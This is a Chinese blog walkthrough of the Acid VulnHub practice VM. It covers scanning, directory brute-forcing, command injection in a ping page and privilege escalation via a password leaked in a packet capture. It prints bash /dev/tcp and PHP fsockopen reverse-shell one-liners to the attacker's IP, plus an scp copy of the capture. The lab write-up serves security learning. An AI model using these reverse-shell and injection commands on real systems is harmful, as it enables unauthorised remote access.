Acid靶机练习

最新推荐文章于 2023-05-04 21:04:48 发布
最新推荐文章于 2023-05-04 21:04:48 发布
阅读量337 收藏
点赞数
分类专栏: 靶机 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yifujiadeng/article/details/116452387
版权

Acid靶机练习

网络结构:

环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24

网络由攻击机kali、靶机组成

靶机ip:192.168.1.140

kali linux ip:192.168.1.137

信息收集:

主机发现:

nmap -sP 192.168.1.0/24

下图中192.168.1.1为VMnet8网卡地址,1.3为网关地址,1.137为攻击机地址,因此推测目标主机地址为192.168.1.140

image-20210203223609124

端口扫描:

可以看到目标机器使用了Apache作为中间件,开放了33447端口

nmap -p 1-65535 -A 192.168.1.140 -sV

image-20210204093237048

访问一下看看,发现是一个静态页面,扫描一下目录看看

首先用dirb扫一下,已经用了big的字典,但扫到的目录条目还是很少

image-20210204100917676

再用dirbuster爆破目录

选好字典,爆破目录选择根目录

点击start开始爆破,得到了比较全面的爆破结果

image-20210204202104586

漏洞挖掘:

访问查看各条目,challenge目录下是一个登录页面,先放着不管

image-20210204202215238

一路向下访问,到cake.php条目下的时候,可以看到标签页上出现了一个目录名Magic_Box,结合页面上的话,另外页面叫cake.php,这个目录应该是有用的

image-20210204204000254

再次爆破这个Magic_Box目录

image-20210204222202012

image-20210204224446448

得到的结果中有一个command.php,访问后发现是一个可以执行ping命令的页面

image-20210204224626144

测试命令注入,提交参数后并没有回显信息,burp抓包看一下,果然,信息是有的,只是没有直接回显到页面

image-20210204225054147

用ifconfig测试一下,发现果然存在命令注入

image-20210204225212133

尝试反弹shell

bash -i >& /dev/tcp/192.168.1.137/4444 0>&1

image-20210205175956076

kali端监听4444端口

image-20210205173317428

未果,反弹失败,尝试转url编码,依旧反弹失败

image-20210205175147349

尝试其他的反弹方式

;php -r '$sock=fsockopen("192.168.1.137",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹成功

提权:

首先查看passwd文件,看一下用户

着重关注acid、saman两个用户

image-20210205200204389

查看一下这两个用户的文件

find / -user saman 2>/dev/null

image-20210205200354607

find / -user acid 2>/dev/null

image-20210205200506712

在acid的文件中可以看到一个抓包文件hunt.pcapng,显得格格不入,我们通过ssh把它复制下来,这里因为kali linux为保证安全性,ssh是默认禁止连接的,需要修改配置文件,这里我直接使用了另外一台centos来接收文件,ip为192.168.1.131

首先取得一个交互shell,以进行下一步操作,在原本shell中输入以下命令

python -c "import pty;pty.spawn('/bin/bash');"

然后使用命令scp来复制传输文件,如图传输成功

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.1.131:/root/hint.pcapng

image-20210205201641880

拿到抓包文件后,用wireshark打开

image-20210205201844205

逐包查看,未果,可以分数据包种类跟踪流,查看数据包信息

追踪tcp流时,可以看到saman用户的密码

image-20210205202141370

我们切换到此用户saman,成功切换,之后再尝试用户saman切换root,发现有权限,切换成功,提权至root

image-20210205202547170

参考文章:https://www.freebuf.com/column/200518.html

compact disk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶场渗透(二)——Acid渗透
Ramona的博客
08-02 884
测试环境 靶机Acid 打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描靶机Ip及开放端口 扫描ip:nmap -sP 192.168.111.1/24 扫描端口:nmap -p1-65535 -sV 靶机Ip 获取信息:ip为192.168.111.129 开放端口为33447/tcp 提供服务为web和apache 操作系统为ubun...
靶机实战-Acid
滕财然的博客
01-26 789
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
Acid靶场实战
m0_65149086的博客
05-04 369
云尘靶场,靶机渗透,Vulhnub,Acid
Acid靶机渗透
weixin_30567225的博客
08-03 730
Acid渗透靶机实战 攻击机:kali 192.168.41.147 靶机: acid 192.168.41.149 信息收集 ip发现 开启Acid靶机,通过nmap进行局域网存火主机扫描.![](https://img2018.cnblogs.com/blog/1357258/201907/1357258-20190725111009774-877137553.p...
靶机渗透实战-Acid
qq_46540840的博客
02-04 3177
文章目录 这几天有点事情,靶机方面就没在更新,后边会积极的更新。 文章目录文章目录信息收集漏洞发现利用提权总结 信息收集 信息收集是必不可少的. 首先用自己的kali当攻击机,下载acid靶机 靶机下载地址 首先进行靶机发现 nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址) 然后对主机进行端口扫描 nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
靶机happycorp实战练习
09-08
学习
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
靶机渗透实战1:Acid: Server
anbangsi3839的博客
07-12 269
一、准备说明: 攻击机:WMware 中的 Kali Linux 靶机:VMware 中的Acid: Server(下载地址:https://www.vulnhub.com/entry/acid-server,125/) 目标:Escalate the privileges to root and capture the flag 二、信息收集 2.1 查找靶机 IP 地址:...
VulnHub打靶の-Acid
壊壊的诱惑你的博客
10-12 1159
靶机地址:https://download.vulnhub.com/acid/Acid.rar 首先nmap -sP 或netdiscover -r来找靶机的IP,此为192.168.1.171 nmap -sV -p- 192.168.1.171扫描靶机的全部端口的服务版本: root@Kali-X86:~# nmap -sV -p- 192.168.1.171 Starting Nmap...
ACID: SERVER-VulnHub靶机学习第一篇
qq_27466929的博客
08-23 391
ACID: SERVER
Acid渗透靶机使用说明
火柴人的博客
08-07 214
安全客:https://www.anquanke.com/post/id/105462 已经下载好,在桌面; 网上用很多使用教程;
【Vulnhub系列】Acid
大方子
11-28 1478
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
ACID: SERVER靶机入侵笔记
RestoreJustice的博客
03-16 167
这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片目录通常是这样命名。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。在tmp目录试了一下,wget、gcc命令不存在,这个靶机应该不能直接用内核提权,应该找一下看能不能找到密码。访问发现是一个邮箱登录页面,先记录下,看后面能不能找到账号密码,再次爆破目录。
Vulnhub之acid靶机渗透流程
weixin_44255856的博客
08-03 1002
1,检查靶机主机是否存活。 2,检查靶机开放的端口并对端口进行识别 发现33447端口存活(存在web服务) 由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。 3,首先直接御剑一把梭 大概看了下,先放在这里。 F12查看网页源码,发现存在注释。 0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...
渗透Gemimi靶机
午夜安全
10-31 1232
渗透Gemimi靶机 1.nmap扫描与源码审计 使用Nmap扫描靶机如下。 发现22、80端口开着,访问web服务。 发现源码地址,下载源码审计。 发现疑似用户登录密码的信息: 尝试使用admin,1234登录,发现成功登录,如下所示: 登陆后,经过一番探索,发现有一个Edit profie和Export profile,体验这两个功能,我们发现Edit pro...
【HTB系列】靶机Teacher的渗透测试详解
大方子
04-27 1355
Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对靶机进行扫描 nmap -sC -sV -sT 10.10.10.153 只开启了80端口,网页内容如下 一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ...
doubletrouble靶机
最新发布
08-29
- *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值